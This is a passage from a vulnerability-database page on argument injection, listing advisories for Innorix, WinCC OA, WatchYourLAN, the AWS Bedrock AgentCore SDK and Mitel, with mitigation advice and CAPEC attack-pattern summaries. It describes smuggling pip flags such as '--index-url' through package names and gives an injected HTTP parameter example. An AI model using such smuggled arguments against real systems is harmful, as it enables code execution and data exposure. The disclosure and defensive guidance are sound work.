      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47250"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Flux159/mcp-server-kubernetes"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Flux159/mcp-server-kubernetes/releases/tag/v3.7.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "MCP Server Kubernetes: kubectl-generic flag injection enables Kubernetes bearer token exfiltration"
}

GHSA-6P32-QJ2R-MRW2

Vulnerability from github – Published: 2022-05-24 17:47 – Updated: 2022-05-24 17:47
VLAI
Details

Innorix Web-Based File Transfer Solution versuibs prior to and including 9.2.18.385 contains a vulnerability that could allow remote files to be downloaded and executed by setting the arguments to the internal method. A remote attacker could induce a user to access a crafted web page, causing damage such as malicious code infection.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-7851"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-19T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "Innorix Web-Based File Transfer Solution versuibs prior to and including 9.2.18.385 contains a vulnerability that could allow remote files to be downloaded and executed by setting the arguments to the internal method. A remote attacker could induce a user to access a crafted web page, causing damage such as malicious code infection.",
  "id": "GHSA-6p32-qj2r-mrw2",
  "modified": "2022-05-24T17:47:46Z",
  "published": "2022-05-24T17:47:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7851"
    },
    {
      "type": "WEB",
      "url": "https://www.innorix.com/ko"
    },
    {
      "type": "WEB",
      "url": "https://www.krcert.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=35984"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6QQJ-P988-F82Q

Vulnerability from github – Published: 2022-12-13 18:30 – Updated: 2022-12-15 21:30
VLAI
Details

A vulnerability has been identified in SIMATIC WinCC OA V3.15 (All versions), SIMATIC WinCC OA V3.16 (All versions < V3.16 P035), SIMATIC WinCC OA V3.17 (All versions < V3.17 P024), SIMATIC WinCC OA V3.18 (All versions < V3.18 P014). The affected component allows to inject custom arguments to the Ultralight Client backend application under certain circumstances. This could allow an authenticated remote attacker to inject arbitrary parameters when starting the client via the web interface (e.g., open attacker chosen panels with the attacker's credentials or start a Ctrl script).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-44731"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-13T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in SIMATIC WinCC OA V3.15 (All versions), SIMATIC WinCC OA V3.16 (All versions \u003c V3.16 P035), SIMATIC WinCC OA V3.17 (All versions \u003c V3.17 P024), SIMATIC WinCC OA V3.18 (All versions \u003c V3.18 P014). The affected component allows to inject custom arguments to the Ultralight Client backend application under certain circumstances. This could allow an authenticated remote attacker to inject arbitrary parameters when starting the client via the web interface (e.g., open attacker chosen panels with the attacker\u0027s credentials or start a Ctrl script).",
  "id": "GHSA-6qqj-p988-f82q",
  "modified": "2022-12-15T21:30:28Z",
  "published": "2022-12-13T18:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-44731"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-547714.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6RCP-WVH6-8QH8

Vulnerability from github – Published: 2026-01-23 06:31 – Updated: 2026-01-23 06:31
VLAI
Details

WatchYourLAN Configuration Page Argument Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WatchYourLAN. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of the arpstrs parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26708.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-0774"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-23T04:16:04Z",
    "severity": "HIGH"
  },
  "details": "WatchYourLAN Configuration Page Argument Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WatchYourLAN. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the arpstrs parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26708.",
  "id": "GHSA-6rcp-wvh6-8qh8",
  "modified": "2026-01-23T06:31:24Z",
  "published": "2026-01-23T06:31:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0774"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-039"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6RFW-MQ36-JM8H

Vulnerability from github – Published: 2026-06-19 14:46 – Updated: 2026-06-19 14:46
VLAI
Summary
Improper neutralization of argument delimiters in AWS Bedrock AgentCore Python SDK install_packages()
Details

Summary

The AWS Bedrock AgentCore Python SDK (bedrock-agentcore) is an open-source SDK that enables developers to build, deploy, and manage agents on AWS Bedrock AgentCore. An issue exists in the install_packages() method of the Code Interpreter client where crafted package name arguments can bypass input validation and allow a remote authenticated user to execute arbitrary commands within the Code Interpreter sandbox.

Impact

The install_packages() method constructs a 'pip install' shell command executed within the Code Interpreter sandbox using package name arguments provided by the caller. The method applied an incomplete blocklist that allowed crafted package name arguments - specifically pip flags such as '--index-url' and '-r' - to pass validation unchecked. A remote authenticated user who can influence the arguments passed to install_packages() could redirect package resolution to a third-party-controlled PyPI server, or expose the contents of arbitrary sandbox files and environment variables.

Impacted versions: AWS Bedrock AgentCore Python SDK (bedrock-agentcore) versions >= 1.1.3 and < 1.6.1

Patches

This issue has been addressed in bedrock-agentcore version 1.6.1. We recommend upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.

Workarounds

If you are unable to upgrade immediately, avoid passing any user-supplied or externally-influenced strings directly to install_packages(). Restrict calls to a fixed, hardcoded list of approved package names within your application code.

References

If you have any questions or comments about this advisory, we ask that you contact AWS Security via our vulnerability reporting page or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.

We would like to thank Sergio Garcia for collaborating on this issue through the coordinated vulnerability disclosure process.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "bedrock-agentcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.3"
            },
            {
              "fixed": "1.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-12530"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T14:46:33Z",
    "nvd_published_at": "2026-06-17T22:16:20Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe AWS Bedrock AgentCore Python SDK (bedrock-agentcore) is an open-source SDK that enables developers to build, deploy, and manage agents on AWS Bedrock AgentCore. An issue exists in the install_packages() method of the Code Interpreter client where crafted package name arguments can bypass input validation and allow a remote authenticated user to execute arbitrary commands within the Code Interpreter sandbox.\n\n\n### Impact\nThe install_packages() method constructs a \u0027pip install\u0027 shell command executed within the Code Interpreter sandbox using package name arguments provided by the caller. The method applied an incomplete blocklist that allowed crafted package name arguments - specifically pip flags such as \u0027--index-url\u0027 and \u0027-r\u0027 - to pass validation unchecked. A remote authenticated user who can influence the arguments passed to install_packages() could redirect package resolution to a third-party-controlled PyPI server, or expose the contents of arbitrary sandbox files and environment variables.\n\n**Impacted versions:** AWS Bedrock AgentCore Python SDK (bedrock-agentcore) versions \u003e= 1.1.3 and \u003c 1.6.1\n\n### Patches\nThis issue has been addressed in bedrock-agentcore version 1.6.1. We recommend upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes. \n\n### Workarounds\nIf you are unable to upgrade immediately, avoid passing any user-supplied or externally-influenced strings directly to install_packages(). Restrict calls to a fixed, hardcoded list of approved package names within your application code.\n\n### References\nIf you have any questions or comments about this advisory, we ask that you contact AWS Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.\n\n\nWe would like to thank Sergio Garcia for collaborating on this issue through the coordinated vulnerability disclosure process.",
  "id": "GHSA-6rfw-mq36-jm8h",
  "modified": "2026-06-19T14:46:33Z",
  "published": "2026-06-19T14:46:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aws/bedrock-agentcore-sdk-python/security/advisories/GHSA-6rfw-mq36-jm8h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12530"
    },
    {
      "type": "WEB",
      "url": "https://aws.amazon.com/security/security-bulletins/2026-044-aws"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aws/bedrock-agentcore-sdk-python"
    },
    {
      "type": "WEB",
      "url": "https://pypi.org/project/bedrock-agentcore/1.6.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Improper neutralization of argument delimiters in AWS Bedrock AgentCore Python SDK install_packages()"
}

GHSA-6WF9-3GRQ-C3X5

Vulnerability from github – Published: 2023-08-26 00:30 – Updated: 2024-04-04 07:13
VLAI
Details

A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an authenticated attacker with elevated privileges and internal network access to conduct a command argument injection due to insufficient parameter sanitization. A successful exploit could allow an attacker to access network information and to generate excessive network traffic.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-39288"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-08-25T22:15:10Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an authenticated attacker with elevated privileges and internal network access to conduct a command argument injection due to insufficient parameter sanitization. A successful exploit could allow an attacker to access network information and to generate excessive network traffic.",
  "id": "GHSA-6wf9-3grq-c3x5",
  "modified": "2024-04-04T07:13:26Z",
  "published": "2023-08-26T00:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39288"
    },
    {
      "type": "WEB",
      "url": "https://www.mitel.com/support/security-advisories"
    },
    {
      "type": "WEB",
      "url": "https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-23-0011"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Strategy: Parameterization

Where possible, avoid building a single string that contains the command and its arguments. Some languages or frameworks have functions that support specifying independent arguments, e.g. as an array, which is used to automatically perform the appropriate quoting or escaping while building the command. For example, in PHP, escapeshellarg() can be used to escape a single argument to system(), or exec() can be called with an array of arguments. In C, code can often be refactored from using system() - which accepts a single string - to using exec(), which requires separate function arguments for each parameter.

Mitigation
Architecture and Design

Strategy: Input Validation

Understand all the potential areas where untrusted inputs can enter your product: parameters or arguments, cookies, anything read from the network, environment variables, request headers as well as content, URL components, e-mail, files, databases, and any external systems that provide data to the application. Perform input validation at well-defined interfaces.

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation
Implementation

Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained.

Mitigation
Implementation
  • Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.
  • Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content.
Mitigation
Implementation

When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.

Mitigation
Implementation

When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined.

Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

CAPEC-137: Parameter Injection

An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value "myInput&new_param=myValue", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.

CAPEC-174: Flash Parameter Injection

An adversary takes advantage of improper data validation to inject malicious global parameters into a Flash file embedded within an HTML document. Flash files can leverage user-submitted data to configure the Flash document and access the embedding HTML document.

CAPEC-41: Using Meta-characters in E-mail Headers to Inject Malicious Payloads

This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.

CAPEC-460: HTTP Parameter Pollution (HPP)

An adversary adds duplicate HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.

CAPEC-88: OS Command Injection

In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.